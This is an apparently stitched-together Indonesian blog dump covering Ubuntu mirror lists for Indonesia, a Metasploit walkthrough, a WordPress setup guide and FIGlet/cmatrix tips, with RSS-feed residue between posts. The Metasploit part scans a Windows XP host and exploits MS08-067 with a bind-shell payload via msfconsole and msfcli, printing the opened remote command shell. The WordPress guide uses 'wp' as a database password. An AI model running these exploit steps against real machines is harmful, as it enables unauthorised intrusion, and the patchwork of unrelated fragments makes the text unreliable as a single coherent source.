deb-src http://kambing.ui.edu/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://kambing.ui.edu/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://kambing.ui.edu/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://kambing.ui.edu/ubuntu gutsy-security main restricted universe multiverse
deb-src http://kambing.ui.edu/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.kambing
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.kambing /etc/apt/sources.list
sudo apt-get update

Repositori CBN Mirror (OpenIXP)
Informasi situs: http://mirror.cbn.net.id

### sources.list.cbn
### Repository dengan menggunakan server mirror.cbn.net.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://ubuntu.cbn.net.id/Ubuntu gutsy main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://ubuntu.cbn.net.id/Ubuntu gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://ubuntu.cbn.net.id/Ubuntu gutsy-security main restricted universe multiverse
deb-src http://ubuntu.cbn.net.id/Ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.cbn
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.cbn /etc/apt/sources.list
sudo apt-get update

Repositori Komo (OpenIXP)
Informasi situs: http://komo.vlsm.org

### sources.list.komo
### Repository dengan menggunakan server mirror komo.vlsm.org
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://komo.vlsm.org/ubuntu gutsy main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu/ gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://komo.vlsm.org/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://komo.vlsm.org/ubuntu gutsy-security main restricted universe multiverse
deb-src http://komo.vlsm.org/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.komo
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.komo /etc/apt/sources.list
sudo apt-get update

Repositori IndikaNet (OpenIXP)
Informasi situs: http://indika.net.id

### sources.list.indika
### Repository dengan menggunakan server mirror ubuntu.indika.net.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://ubuntu.indika.net.id/ gutsy main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://ubuntu.indika.net.id/ gutsy-updates main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://ubuntu.indika.net.id/ gutsy-security main restricted universe multiverse
deb-src http://ubuntu.indika.net.id/ gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.indika
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.indika /etc/apt/sources.list
sudo apt-get update

Repositori ITB (Network ITB & Inherent) – FTP only
Informasi situs: ftp://ftp.itb.ac.id

### sources.list.ftpitb
### Repository dengan menggunakan server mirror ftp.itb.ac.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy-updates main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb ftp://ftp.itb.ac.id/pub/ubuntu gutsy-security main restricted universe multiverse
deb-src ftp://ftp.itb.ac.id/pub/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.ftpitb
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.ftpitb /etc/apt/sources.list
sudo apt-get update

Repositori UGM (Inherent)
Informasi situs: http://info.ugm.ac.id dan http://repo.ugm.ac.id/

### sources.list.ugm
### Repository dengan menggunakan server mirror repo.ugm.ac.id
### Untuk saat ini repo.ugm.ac.id hanya tersedia dist gutsy saja
## REPOSITORY UTAMA
deb http://repo.ugm.ac.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://repo.ugm.ac.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://repo.ugm.ac.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.ugm
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.ugm /etc/apt/sources.list
sudo apt-get update

Repositori FOSS-ID (Telkom)
Informasi situs: http://www.foss-id.web.id

### sources.list.foss-id
### Repository dengan menggunakan server mirror foss-id.web.id
### Untuk rilis lain selain gutsy silakan ganti semua kata gutsy
### dengan misalnya dapper atau feisty dsb
## REPOSITORY UTAMA
deb http://dl2.foss-id.web.id/ubuntu gutsy main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://dl2.foss-id.web.id/ubuntu gutsy-updates main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://dl2.foss-id.web.id/ubuntu gutsy-security main restricted universe multiverse
deb-src http://dl2.foss-id.web.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.foss-id
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.foss-id /etc/apt/sources.list
sudo apt-get update

Repositori ITS (Inherent)
Informasi situs: http://mirror.its.ac.id/

### sources.list.its
### Repository dengan menggunakan server mirror mirror.its.ac.id
## REPOSITORY UTAMA
deb http://mirror.its.ac.id/ubuntu gutsy main restricted universe multiverse
## INI UNTUK MAJOR BUG FIX UPDATES
deb http://mirror.its.ac.id/ubuntu gutsy-updates main restricted universe multiverse
## INI UNTUK UBUNTU SECURITY UPDATES
deb http://mirror.its.ac.id/ubuntu gutsy-security main restricted universe multiverse

Cara penggunaan:

wget http://arsip.ubuntu-id.org/berkas/sources.list.its
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list.its /etc/apt/sources.list
sudo apt-get update

Repository UNEJ (OpenIXP, Telkom)
Informasi situs: http://mirror.unej.ac.id/

### sources.list.unej
deb http://mirror.unej.ac.id/ubuntu/ intrepid main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb http://mirror.unej.ac.id/ubuntu/ intrepid-security main restricted universe multiverse
deb-src http://mirror.unej.ac.id/ubuntu/ intrepid-security main restricted universe multiverse

Cara penggunaan:

wget http://mirror.unej.ac.id/doc/sources.list-ubuntu.intrepid
sudo mv /etc/apt/sources.list /etc/apt/sources.list.original
sudo cp sources.list-ubuntu.intrepid /etc/apt/sources.list
sudo apt-get update

Repository KLAS (IIXJI, Radnet)
Informasi situs: http://buaya.klas.or.id/

### sources.list.buaya
deb http://buaya.klas.or.id/ubuntu/ intrepid main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid-updates main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ intrepid-security main restricted universe multiverse
deb-src http://buaya.klas.or.id/ubuntu/ intrepid-security main restricted universe multiverse

Metasploit : msfconsole
Lets go.. pertama kali kita coba dengan testing manual menggunakan metasploit console (msfconsole) yang mana test ini dilakukan pada single mesin windows xp sp2 dengan melakukan percoban exploit ms windows MS08-067 yaitu vulner pada microsoft windows di port 445 beberapa waktu yang lalu yang sempet bikin microsoft kelimpungan . Dari terminal console ketik perintah berikut, seperti pada gambar dibawah:
$ msfconsole

Untuk perintah-perintah lainnya bisa dipelajari dengan mengetikkan help :

msf > help

Core Commands
=============

Command       Description
-------       -----------
?             Help menu
back          Move back from the current context
banner        Display an awesome metasploit banner
cd            Change the current working directory
connect       Communicate with a host
exit          Exit the console
help          Help menu
info          Displays information about one or more module
irb           Drop into irb scripting mode
jobs          Displays and manages jobs
load          Load a framework plugin
loadpath      Searches for and loads modules from a path
quit          Exit the console
resource      Run the commands stored in a file
route         Route traffic through a session
save          Saves the active datastores
search        Searches module names and descriptions
sessions      Dump session listings and display information about sessions
set           Sets a variable to a value
setg          Sets a global variable to a value
show          Displays modules of a given type, or all modules
sleep         Do nothing for the specified number of seconds
unload        Unload a framework plugin
unset         Unsets one or more variables
unsetg        Unsets one or more global variables
use           Selects a module by name
version       Show the framework and console library version numbers

Untuk melihat list exploits-nya , gunakan perintah :

msf > show exploits

List seluruh exploit yang ada kira-kira seperti ini (saya paste sebagian saja biar ndak terlalu panjang) :

windows/smb/ms05_039_pnp              Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg      Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras             Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi           Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi            Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks            Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi           Microsoft Server Service Relative Path Stack Corruption

Scan mesin target menggunakan nmap. Dalam contoh kasus kali ini kita gunakan kompi dg ip 192.168.1.28 :

msf > sudo nmap -v -sS -A -O 192.168.1.28

[*] exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up ... good.
Interesting ports on 192.168.1.28:
Not shown: 1712 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

msf exploit(ms08_067_netapi) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (NX)
   4   Windows XP SP3 English (NX)
   -------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================
   Name                                            Description
   ----                                            -----------
   generic/debug_trap                Generic x86 Debug Trap
   generic/debug_trap/bind_ipv6_tcp  Generic x86 Debug Trap, Bind TCP Stager (IPv6)
   generic/debug_trap/bind_nonx_tcp  Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
   generic/debug_trap/bind_tcp       Generic x86 Debug Trap, Bind TCP Stager
----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.28     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)  

Payload options (windows/shell_bind_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.1.28     no        The target address
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting

sekarang jalankan exploit :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254

C:\WINDOWS\system32>

Dan ternyata emang masih bolong… :p

Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.

sinchan@hydra:~$ msfcli –help

[*] Please wait while we load the module tree...
Error: Invalid module: --help
Usage: /usr/local/bin/msfcli   [mode]
=================================================================
    Mode           Description
    ----           -----------
    (H)elp         You're looking at it baby!
    (S)ummary      Show information about this module
    (O)ptions      Show available options for this module
    (A)dvanced     Show available advanced options for this module
    (I)DS Evasion  Show available ids evasion options for this module
    (P)ayloads     Show available payloads for this module
    (T)argets      Show available targets for this exploit module
    (AC)tions      Show available actions for this auxiliary module
    (C)heck        Run the check routine of the selected module
    (E)xecute      Execute the selected module

So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:

IP Addr Target	: 192.168.1.28
Port target	: 445
Exploit		: windows/smb/ms08_067_netapi
Payload		: windows/shell_bind_tcp
Exploit target	: 0

Dan implementasinya menjadi seperti ini :

sinchan@hydra:~$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E

[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.28
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.
Artikel ini sebenarnya pengen saya lanjutkan dengan db_auotpwn, tapi ternyata capek juga nulis segini panjang. Yah terpaksa bikin berseri : Metasploit II : Mass exploitation. Nyusul yah….
Use this article and this information wisely…

Sumber :
- http://trac.metasploit.com/
- https://wiki.remote-exploit.org/backtrack/wiki

$ sudo apt-get install apache2 php5 mysql-server apache2-suexec php5-mysql php5-gd php5-suhosin libapache2-mod-php5

Kemudian buka file httpd.conf di folder /etc/apache2. Gunakan editor yang anda suka:

$ sudo vi /etc/apache2/httpd.conf

Tambahkan dengan nama server (terserah anda) :

Servername www.masrony.com:80

simpan konfigurasi tersebut dan restart apache-nya :

$ sudo /etc/init.d/apache2 restart

Buat file dengan nama info.php di folder /var/www :

$ sudo touch /var/www/info.php

Edit file tersebut seperti berikut ini :

$ sudo vi /var/www/info.php

<?php
phpinfo();
phpinfo(INFO_MODULES);
?>

Simpan file tersebut (simpan file menggunakan vi : Shift + zz) dan buka browser dan ketikkan url : http://localhost/info.php. Sehingga akan tampil hasil konfigurasi web server anda seperti ini :

Instalasi web server sudah selesai. Untuk mempelajari lebih lanjut mengenai web server ini silahkan anda buka manual page yang telah disediakan. Kemudian download wordpress versi terbaru disini, dengan menggunakan wget :

$ sudo wget -c http://wordpress.org/latest.zip

Kemudian mekarkan file kompresi tersebut :

$ unzip latest.zip

Hasil ekstraksi file tersebut berada dalam folder wordpress. Pindahkan semua file tersebut ke dalam folder /var/www (root direktori apache) :

$ sudo mv wordpress/* /var/www

Kemudian buat database wordpress dengan user wp dan password wp untuk instalasi wordpress ini di mysql :

sinchan@hydra:~$ mysql -u root -p mysql

Enter password: ***********
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
mysql> create database wordpress;
Query OK, 1 row affected (0.00 sec)
mysql> grant all on wordpress.* to wp@localhost identified by ‘wp’;
Query OK, 0 rows affected (0.07 sec)
mysql> flush privileges;
Query OK, 0 rows affected (0.00 sec)
mysql> exit
Bye
sinchan@hydra:~$

Kemudian kopi file wp-config-sample.php menjadi wp-config.php di folder /var/www dan edit konfigurasi database di file tersebut :

$ sudo cp /var/www/wp-config-sample.php /var/www/wp-config.php
$ sudo vi /var/www/wp-config.php

Ubah bagian DB_NAME, DB_USER, dan DB_PASSWORD seperti dibawah ini (sesuai konfigurasi database di atas) :

———————–
// ** MySQL settings – You can get this info from your web host ** //
/** The name of the database for WordPress */
define(‘DB_NAME’, ‘wordpress’);
/** MySQL database username */
define(‘DB_USER’, ‘wp’);

/** MySQL database password */
define(‘DB_PASSWORD’, ‘wp’);

/** MySQL hostname */
define(‘DB_HOST’, ‘localhost’);
———————–

Simpan file tersebut. Konfigurasi wordpress sudah selesai dan next step : instalasi wordpress. Instalasi wordpress, dilakukan dari web browser. Buka web browser anda dan ketikkan url : http://localhost/wp-admin/install.php, seperti dibawah ini:

Isi informasi blog yang anda buat dan tekan Install Wordpress. Setelah instalasi sukses, anda akan mendapatkan username dan password wordpress, seperti gambar dibawah ini:

Tekan login untuk masuk ke menu administrasi wordpress dan masukkan user dan password yang telah diberikan sebelumnya seperti gambar di bawah:

Wordpress telah siap digunakan, silahkan anda kembangkan kreatitifitas anda:

]]> http://www.masrony.com/2009/03/simple-wordpress-installation/feed/ 1 http://www.masrony.com/2009/03/figcharacters-menggunakan-figlet/ http://www.masrony.com/2009/03/figcharacters-menggunakan-figlet/#comments Sat, 14 Mar 2009 09:51:50 +0000 Mas Rony http://www.masrony.com/?p=95 Apakah anda pernah melihat footer email atau motd seperti ini :

         _ __ ___   __ _ ___ _ __ ___  _ __  _   _   ___ ___  _ __ ___
        | '_ ` _ \ / _` / __| '__/ _ \| '_ \| | | | / __/ _ \| '_ ` _ \
        | | | | | | (_| \__ \ | | (_) | | | | |_| || (_| (_) | | | | | |
        |_| |_| |_|\__,_|___/_|  \___/|_| |_|\__, (_)___\___/|_| |_| |_|
                                              __/ |
                                             |___/

Atau seperti ini :

 ______________________________________________________________________________________
 oo_oo_oo___ooooo___oooo__oo_ooo___ooooo__oo_ooo___o___oo_____ooooo___ooooo__oo_oo_oo__
 ooo_oo__o_oo___oo_oo___o_ooo___o_oo___oo_ooo___o__o___oo____oo___oo_oo___oo_ooo_oo__o_
 oo__oo__o_oo___oo___oo___oo______oo___oo_oo____o__o___oo____oo______oo___oo_oo__oo__o_
 oo__oo__o_oo___oo_o___oo_oo______oo___oo_oo____o___ooooo_oo_oo______oo___oo_oo__oo__o_
 oo______o__oooo_o__oooo__oo_______ooooo__oo____o_o____oo_oo__ooooo___ooooo__oo______o_
 __________________________________________________ooooo_______________________________

atau seperti ini :

       __  __    __    ___  ____  _____  _  _  _  _   ___  _____  __  __
      (  \/  )  /__\  / __)(  _ \(  _  )( \( )( \/ ) / __)(  _  )(  \/  )
       )    (  /(__)\ \__ \ )   / )(_)(  )  (  \  / ( (__  )(_)(  )    (
      (_/\/\_)(__)(__)(___/(_)\_)(_____)(_)\_) (__)()\___)(_____)(_/\/\_)

Saya sendiri sering sekali melihat banner seperti itu. Dalam hati saya, kok ada yah orang yang begitu telaten merangkai huruf-huruf menjadi banner seperti itu. Sangat kreatif.. Ternyata rangkaian huruf-huruf tersebut dinamakan FIGcharacters, dan dibuat menggunakan aplikasi yang dinamakan FIGlet.. hehehe.. katro’ yah.. baru tahu sekarang… Kalau tertarik untuk mencoba, bisa download di ftp://ftp.figlet.org/pub/figlet/. Dukungan terhadap operating systemnya juga cukup lengkap.

Karena saya make ubuntu cukup minta ke repository dengan menuliskan di console seperti ini :

sinchan@cluster1:~$ sudo apt-get install figlet

Tambahkan font-font yang mendukung FIGlet dengan cara :

sinchan@cluster1:~$ wget -c ‘http://www.jave.de/figlet/figletfonts40.zip’ -O fonts.zip

Kemudian ekstrak file fonts.zip tersebut :

sinchan@cluster1:~$ unzip fonts.zip

Pindahkan semua files di folder fonts ke folder /usr/share/figlet :

sinchan@cluster1:~$ sudo cp fonts/* /usr/share/figlet/

Selesai dan mari kita test figlet kita dengan font-font tersebut

sinchan@cluster1:~$ figlet mas rony -ctf roman

ooo. .oo.  .oo.    .oooo.    .oooo.o    oooo d8b  .ooooo.  ooo. .oo.   oooo    ooo
`888P"Y88bP"Y88b  `P  )88b  d88(  "8    `888""8P d88' `88b `888P"Y88b   `88.  .8'
 888   888   888   .oP"888  `"Y88b.      888     888   888  888   888    `88..8'
 888   888   888  d8(  888  o.  )88b     888     888   888  888   888     `888'
o888o o888o o888o `Y888""8o 8""888P'    d888b    `Y8bod8P' o888o o888o     .8'
                                                                       .o..P'
                                                                       `Y8P'

Untuk parameter yang lain bisa dilihat di manual page. Selamat mencoba..

Nah bagi anda yang sering bekerja di lingkungan shell atau console, animasi ini mungkin bisa sedikit menghibur dan memberi warna lain di layar hitam anda. Animasi ini bernama cmatrix dan ditulis oleh Chris Allegretta (kalo ga salah udah jadul bgt… dulu tahun ‘99) dan bagi yang tertarik untuk mencoba, bisa mengunduh source tarbal-nya  disini. Dan bagi pengguna ubuntu (seperti saya xD) malah lebih lebih mudah intalasinya karena tidak perlu mengunduh tarbalnya, tapi tinggal buka terminal dan ketik :
sinchan@cluster1:~$ sudo apt-get install cmatrix
Nah animasi sudah siap digunakan dan selamat bernostalgia dengan ‘Matrix Reloaded’